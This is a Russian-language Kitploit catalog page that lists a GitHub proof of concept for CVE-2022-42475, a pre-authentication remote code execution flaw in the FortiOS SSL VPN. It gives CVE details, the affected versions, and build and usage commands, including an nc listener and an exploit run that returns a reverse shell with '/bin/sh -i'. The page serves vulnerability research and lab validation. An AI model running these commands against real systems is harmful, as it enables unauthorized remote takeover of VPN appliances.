Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2022-42475-poc — Proof of Concept (PoC) для исследований и контролируемой лабораторной валидации CVE-2022-42475 — критической уязвимости переполнения буфера в куче, затрагивающей сервис SSL-VPN в определённых версиях FortiOS. | Kitploit
Инструменты/GitHubGitHub/ull0a/cve-2022-42475-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubull0a/cve-2022-42475-poc

cve-2022-42475-poc

Proof of Concept (PoC) для исследований и контролируемой лабораторной валидации CVE-2022-42475 — критической уязвимости переполнения буфера в куче, затрагивающей сервис SSL-VPN в определённых версиях FortiOS.

Репозиторий
16 ч 32 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-42475 PoC

Fortinet SSL VPN Pre-Authentication Remote Code Execution

Описание

CVE-2022-42475 — это уязвимость переполнения буфера в куче (heap-based buffer overflow) в сервисе SSL VPN FortiOS, которая позволяет неаутентифицированным злоумышленникам удалённо выполнять произвольный код (RCE) с помощью специально crafted HTTP-запросов, направленных на конечную точку /remote/error.

Эта уязвимость активно эксплуатировалась в реальных атаках (0-day) до публикации официального патча.

Выполнение PoC

Следующий скриншот показывает выполнение PoC в авторизованной лабораторной среде:

Вывод показывает выполнение PoC и взаимодействие с экземпляром FortiOS, использованным для тестов.

Выполнение PoC

Информация о CVE

ПолеЗначение
CVE IDCVE-2022-42475
CVSS 3.19.3 (Critical)
ВекторCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-122
ОбнаруженоДекабрь 2022
Официальный патчFortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16

Затронутые версии

  • FortiOS 7.2.0–7.2.2
  • FortiOS 7.0.0–7.0.8
  • FortiOS 6.4.0–6.4.10
  • FortiOS 6.2.0–6.2.11
  • FortiOS 6.0.0–6.0.15
  • FortiOS 5.6.0–5.6.14
  • FortiOS 5.4.0–5.4.13
  • FortiOS 5.2.0–5.2.15
  • FortiOS 5.0.0–5.0.14

Требования

  • Go 1.18+ (для компиляции PoC)
  • Сетевой доступ к цели на порту 443 (или настроенном порту SSL VPN)
  • Авторизованная лабораторная среда для проведения тестов

Сборка

root@kitploit:~
# Clonar o descargar el código fuente
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc

# Compilar
go build -o exploit exploit.go

# O ejecutar directamente
go run exploit.go <target> <port> <reverse_ip> <params>

Использование

root@kitploit:~
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]

Пример

root@kitploit:~
# En el atacante, iniciar listener
nc -lvnp 80

# Ejecutar el exploit
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i
Скачать инструмент